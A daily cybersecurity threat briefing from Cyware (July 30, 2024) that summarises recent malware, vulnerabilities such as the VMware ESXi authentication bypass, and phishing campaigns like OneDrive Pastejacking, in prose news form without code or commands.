Cookie Settings

This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.

Cyware Daily Threat Intelligence

Cyware Daily Threat Intelligence - Featured Image

Daily Threat Briefing Jul 30, 2024

A new cyber threat lurks in the form of a PowerShell backdoor discovered by Walmart’s Cyber Intelligence Team, paired with a variant of the Zloader malware. This backdoor uses advanced obfuscation to grant attackers deep system access, enabling further malware deployment.

As new software vulnerabilities emerge, ransomware gangs are quick to pounce on them. Microsoft has issued a critical warning about ransomware gangs, including Storm-0506, Storm-1175, Octo Tempest, and Manatee Tempest, exploiting a vulnerability in VMware ESXi. Identified as CVE-2024-37085, this flaw lets attackers create a new user with full administrative privileges on the ESXi hypervisor.

Meanwhile, a new phishing scam was found targeting Microsoft OneDrive users, tricking them into running a malicious PowerShell script. Known as OneDrive Pastejacking, the attack begins with an email containing an HTML file simulating a OneDrive page and urging the recipient to update their DNS cache.

Top Malware Reported in the Last 24 Hours

New PowerShell backdoor discovered

Walmart’s Cyber Intelligence Team discovered a new PowerShell backdoor alongside a variant of the Zloader/SilentNight malware. The backdoor enables threat actors to gain further access and deploy malware, using advanced obfuscation techniques. Zloader, originally a banking Trojan, has evolved into a multifunctional malware linked to ransomware groups like Ryuk and DarkSide. The PowerShell backdoor shares similarities with another malware called PowerDash, both utilizing obfuscation to hide their functions and communicate with command and control servers.

Polish businesses hit with malware

Cybercriminals are targeting small and medium-sized businesses in Poland, Italy, and Romania with phishing campaigns using malware like Agent Tesla, Formbook, and Remcos RAT. ESET researchers reported that the attackers used compromised email accounts and servers to spread malicious emails and host malware. These campaigns, consisting of nine waves, are using a malware loader known as DBatLoader to deliver the final payloads.

UNC4393 switches to custom malware

UNC4393, the group known for deploying the Black Basta ransomware, has been changing tactics since mid-2022. As per the latest research, UNC4393 initially relied on QAKBOT for access but adapted to using custom malware and different techniques after the takedown of the Qakbot botnet. UNC4393 has transitioned from using readily available tools to custom malware like Black Basta, SystemBC, KnotWrap, DawnCry, and PortYard. They have diversified access methods through DARKGATE and SILENTNIGHT, along with open-source and custom tools for reconnaissance.

Top Vulnerabilities Reported in the Last 24 Hours

Ransomware gangs exploit VMware ESXi bug

Microsoft issued a warning on ransomware gangs exploiting a vulnerability in VMware ESXi authentication bypass in their attacks. The security flaw, identified as CVE-2024-37085, allows attackers to add a new user with full administrative privileges on the ESXi hypervisor. This bug was fixed with the release of ESXi 8.0 U3. The vulnerability has been used in attacks by ransomware groups such as Storm-0506, Storm-1175, Octo Tempest, and Manatee Tempest to deploy Akira and Black Basta ransomware.

XSS threats against Hotjar and Business Insider

Researchers at Salt Labs uncovered critical cross-site scripting (XSS) vulnerabilities in the Hotjar web analytics platform and Business Insider. Exploiting XSS combined with OAuth, a commonly used authentication protocol, could lead to severe breaches. Attackers could gain control of accounts by tricking users into clicking malicious links. Major brands like Adobe, Microsoft, T-Mobile, and Nintendo, serving over a million websites, were at risk of data breaches.

Google fixes authentication weakness

In a recent campaign, cybercriminals managed to bypass Google's email verification to create thousands of Google Workspace accounts and access third-party services. Google has fixed the authentication weakness that allowed this, where bad actors were able to impersonate a domain holder at services that use the "Sign in with Google" feature. Google fixed the issue within 72 hours and added detection to prevent such bypasses in the future.

Top Scams Reported in the Last 24 Hours

EchoSpoofing phishing campaign unveiled

Proofpoint's email protection service was exploited in a phishing campaign called "EchoSpoofing" to send millions of spoofed emails daily impersonating major companies like Disney, Nike, IBM, and Coca-Cola to target Fortune 100 companies. The campaign began in January 2024 and peaked in June with 14 million spoofed emails per day. Guardio Labs discovered the campaign and the security vulnerability in Proofpoint's servers, which allowed threat actors to send emails through compromised Office 365 accounts.

Scammers target OneDrive users

A new phishing scam targeting Microsoft OneDrive users tricks them into running a malicious PowerShell script. Known as OneDrive Pastejacking, the attack begins with an email containing an HTML file simulating a OneDrive page and urging the recipient to update their DNS cache. Clicking on "How to fix" leads users to run a PowerShell command that creates a folder, downloads files, and executes a script. The campaign has been observed in various countries, including the U.S. and the U.K. This tactic, also known as ClickFix, is on the rise according to cybersecurity researchers from ReliaQuest, Proofpoint, and McAfee Labs.

Related Threat Briefings